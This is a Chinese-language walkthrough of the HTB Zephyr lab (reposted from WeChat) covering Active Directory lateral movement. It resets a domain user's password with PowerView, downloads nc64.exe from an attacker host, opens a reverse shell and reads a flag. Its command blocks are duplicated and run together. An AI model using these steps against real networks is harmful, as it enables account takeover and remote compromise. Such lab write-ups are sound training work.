回到BloodHound,我们可以搜索PNT-SVRBPA.PAINTERS.HTB,选择Reachable high value targets,并看到PNT-SVRBPA.PILTERS.HTB是否已启用ForceChangePassword在 BLAKEGPAINTERS.HTB上
BLAKECPINTERS.HTB被允许委派给域控制器,这使我们能够模拟DC计算机帐户来执行DCSync攻击。为了利用这一点,我们将PowerView.ps1(在powersploit里面,/usr/share/windows-resources/powersploit/Recon,域管理员定位)上传到PNT-SVRBPA机器,并发出以下命令来更改blake用户的密码,先加壳,PNT-SVRBPA有window defender
C:UsersAdministratorDesktop> powershell import-module .PowerView.ps1; $UserPassword = ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword $UserPassword -VerboseVERBOSE: [Get-PrincipalContext] Binding to domain 'painters.htb'VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'blake'VERBOSE: [Set-DomainUserPassword] Password for user 'blake' successfully resetC:UsersAdministratorDesktop>C:UsersAdministratorDesktop> hostnamePNT-SVRBPAC:UsersAdministratorDesktop>
# python3 -m http.server 80powershell wget http://10.10.14.12/PowerView.ps1 -o PowerView.ps1
C:UsersAdministratorDesktop> powershell import-module .PowerView.ps1; $UserPassword = ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword $UserPassword -VerboseVERBOSE: [Get-PrincipalContext] Binding to domain 'painters.htb'VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'blake'VERBOSE: [Set-DomainUserPassword] Password for user 'blake' successfully resetC:UsersAdministratorDesktop>C:UsersAdministratorDesktop> hostnamePNT-SVRBPAC:UsersAdministratorDesktop>
现在创建一个新的项目,通过使用Invoke-Command命令
C:UsersAdministratorDesktop> powershell import-module .PowerView.ps1; $UserPassword = ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword $UserPassword -VerboseVERBOSE: [Get-PrincipalContext] Binding to domain 'painters.htb'VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'blake'VERBOSE: [Set-DomainUserPassword] Password for user 'blake' successfully resetC:UsersAdministratorDesktop>C:UsersAdministratorDesktop> powershell import-module .PowerView.ps1; $user = 'paintersblake'; $passwd = 'AbC!@#123'; $secpass = ConvertTo-SecureString $passwd -AsPlainText -Force; $cred = new-object system.management.automation.PSCredential $user,$secpassC:UsersAdministratorDesktop>
当尝试向域控制器进行身份验证时,我们会收到拒绝访问错误,这与PNT-SVRBPA计算机相同。我们尝试对PNT-SVRPSB机器进行身份验证,并能够成功地在服务器上执行命令,由于impacket自带的powershell命令行不好表达,使用nc再反弹一个james的shell,然后再使用
# nc -lvvp 443listening on [any] 443 ...connect to [10.10.14.3] from painters.htb [10.10.110.35] 57559Microsoft Windows [Version 10.0.20348.1726]Microsoft Corporation. All rights reserved.C:UsersAdministratorDesktop>ifconfigifconfigis not recognized as an internal or external command,operable program or batch file.C:UsersAdministratorDesktop>ipconfigipconfigWindows IP ConfigurationEthernet adapter Ethernet0:DNS Suffix . :IPv6 Address . . . . . : fe80::ad85:93f1:8211:e682%5IPv4 Address. . . . . . . . . . . : 192.168.110.53Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.110.1C:UsersAdministratorDesktop>powershell
PS C:UsersAdministratorDesktop> $UserPassword = ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force$UserPassword = ConvertTo-SecureString "AbC!@#123" -AsPlainText -ForcePS C:UsersAdministratorDesktop> Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword $UserPassword -VerboseSet-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword $UserPassword -VerboseVERBOSE: [Get-PrincipalContext] Binding to domain 'painters.htb'VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'blake'VERBOSE: [Set-DomainUserPassword] Password for user 'blake' successfully resetPS C:UsersAdministratorDesktop>PS C:UsersAdministratorDesktop> $user = 'paintersblake'$user = 'paintersblake'PS C:UsersAdministratorDesktop> $passwd = 'AbC!@#123'$passwd = 'AbC!@#123'PS C:UsersAdministratorDesktop> $secpass = ConvertTo-SecureString $passwd -AsPlainText -Force$secpass = ConvertTo-SecureString $passwd -AsPlainText -ForcePS C:UsersAdministratorDesktop> $cred = new-object system.management.automation.PSCredential $user,$secpass$cred = new-object system.management.automation.PSCredential $user,$secpass
然后上传nc,使用Invoke-Command进行连接,注意的是这个shell是会被杀掉的,所以要重复连接,连接后建议不要使用powershell,不然会出现终端假死
PS C:UsersAdministratorDesktop> Invoke-Command -ComputerName PNT-SVRPSB -ScriptBlock { mkdir C:temp1; powershell iwr http://10.10.14.3/nc64.exe -O C:temp1nc64.exe } -Credential $credInvoke-Command -ComputerName PNT-SVRPSB -ScriptBlock { mkdir C:temp1; powershell iwr http://10.10.14.3/nc64.exe -O C:temp1nc64.exe } -Credential $credDirectory: C:Mode LastWriteTime Length Name PSComputerName---- ------------- ------ ---- --------------d----- 15/06/2023 16:00 temp1 PNT-SVRPSBPS C:UsersAdministratorDesktop> Invoke-Command -ComputerName PNT-SVRPSB -ScriptBlock { C:temp1nc64.exe 10.10.14.3 443 -e cmd.exe } -Credential $credInvoke-Command -ComputerName PNT-SVRPSB -ScriptBlock { C:temp1nc64.exe 10.10.14.3 443 -e cmd.exe } -Credential $cred
nc -lvvp 443listening on [any] 443 ...connect to [10.10.14.3] from painters.htb [10.10.110.35] 17434Microsoft Windows [Version 10.0.20348.1726]Microsoft Corporation. All rights reserved.C:UsersBlakeDocuments>hostnamehostnamePNT-SVRPSBC:UsersBlakeDocuments>whoamiwhoamipaintersblakeC:UsersBlakeDocuments>poershell
检查组可以看出blake是本地管理员组的一部分。
C:UsersBlakeDocuments>whoami /groupswhoami /groupsGROUP INFORMATION-----------------Group Name Type SID Attributes========================================== ================ ============ ===============================================================Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled groupBUILTINAdministrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group ownerBUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled groupAuthentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled groupMandatory LabelHigh Mandatory Level Label S-1-16-12288
因为是属于Administrator组里面的,所以直接可以进入Administrator文件夹里面,在桌面PNT-SVRPSB的Administrator桌面有个flag
C:UsersBlakeDocuments>cd C:UsersAdministratorDesktopcd C:UsersAdministratorDesktopC:UsersAdministratorDesktop>dirdirVolume in drive C has no label.Volume Serial Number is 8C67-64E6Directory of C:UsersAdministratorDesktop17:42 <DIR> .19:02 <DIR> ..17:42 33 flag.txt1 File(s) 33 bytes2 Dir(s) 30,431,055,872 bytes freeC:UsersAdministratorDesktop>type flag.txttype flag.txtZEPHYR{7h3_Tru57_h45_B3eN_Br0k3n}
原文始发于微信公众号(Jiyou too beautiful):HTB-Zephyr笔记-Heartbreak
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论